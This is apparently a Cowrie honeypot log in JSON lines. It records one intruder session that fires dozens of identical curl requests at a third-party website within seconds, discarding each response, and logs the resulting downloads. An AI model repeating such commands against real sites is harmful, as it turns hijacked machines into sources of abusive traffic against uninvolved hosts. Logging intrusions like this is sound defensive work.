{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.952231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.952931Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:40.989423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:40.990300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.030167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.030915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.078653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.079138Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.116939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.117614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.158185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.158863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.206729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.207461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.245483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.246158Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.283390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.284048Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.288154Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.325022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.325712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.362571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.363410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.401872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.402743Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.412958Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.443442Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.444156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.481798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.482519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.519327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.520008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.559231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.559951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.566115Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.607599Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.608418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.645427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.646154Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.686751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.687415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.724533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.725190Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.763211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.763890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.801232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.802049Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.841414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.842146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.880376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.881537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.928609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.929407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:41.971353Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:41.972056Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.022483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.023303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.061944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.062689Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.105096Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.105877Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.144938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.145502Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.182865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.183719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.222581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.223425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.260663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.261426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.299032Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.299939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.337348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.338147Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.376184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.376878Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.425022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.425793Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.433924Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.449131Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.707573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.708394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.745272Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.746004Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.749991Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.783331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.784134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.811070Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.822046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.822855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.864792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.865598Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.889801Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.903097Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.903821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.945537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.946371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:42.992782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:42.993568Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.031008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.031889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.080184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.080969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.120614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.121451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.158649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.159394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.165625Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.197332Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.198320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.236347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.237066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.282852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
